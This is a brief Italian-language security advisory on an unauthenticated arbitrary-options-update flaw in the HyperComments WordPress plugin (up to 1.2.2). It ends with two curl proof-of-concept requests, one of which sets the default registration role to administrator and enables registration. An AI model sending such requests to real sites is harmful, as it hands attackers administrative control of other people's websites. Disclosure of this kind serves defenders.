
HyperComments <= 1.2.2 - Non autenticato (Subscriber+) Aggiornamento arbitrario delle opzioni
HyperComments <= 1.2.2 - Aggiornamento arbitrario delle opzioni non autenticato (Subscriber+)
Il plugin HyperComments per WordPress è vulnerabile a modifiche non autorizzate dei dati che possono portare a un'escalation dei privilegi a causa di una mancata verifica delle capacità sulla funzione hc_request_handler in tutte le versioni fino alla 1.2.2 inclusa. Ciò rende possibile a utenti non autenticati di aggiornare opzioni arbitrarie sul sito WordPress. Questa vulnerabilità può essere sfruttata per impostare il ruolo predefinito per la registrazione su amministratore e abilitare la registrazione degli utenti, consentendo agli attaccanti di ottenere accesso amministrativo a un sito vulnerabile.
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"